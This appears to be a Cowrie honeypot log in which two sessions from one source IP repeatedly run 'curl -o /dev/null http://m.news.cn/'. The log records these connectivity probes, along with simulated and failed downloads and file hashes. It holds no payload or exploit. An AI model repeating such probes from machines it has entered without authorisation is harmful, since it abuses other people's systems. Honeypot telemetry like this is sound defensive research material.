{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.250706Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.251466Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.263708Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.288756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.292943Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.300311Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.301682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.309209Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.336407Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.337621Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.367429Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.378000Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.380994Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.409131Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.422121Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.458924Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.463020Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.474840Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.476248Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.494411Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.495764Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.500706Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.507368Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.509916Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.516802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.519249Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.536472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.537859Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.546494Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.555741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.557084Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.573938Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.575314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.583166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.586536Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.598166Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.599560Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.606103Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.613174Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.614113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.621613Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.659376Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.660802Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.675304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.683151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.684413Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.689761Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.691086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.710034Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.735651Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.743754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.744983Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.746616Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.749945Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.751357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.781969Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.800639Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.807948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.809382Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.814652Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.815896Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.903288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.904614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.908750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.909943Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.957195Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.959291Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.973672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.975202Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.984388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.985617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.988197Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.010949Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.021636Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.024132Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.027383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.033349Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.036098Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.037405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.040190Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.056364Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.059848Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.061908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.065276Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.067147Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.071084Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.078516Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.079813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.101614Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.107144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.108936Z","src_ip":"212.227.125.160","session":"7541ed730449"}
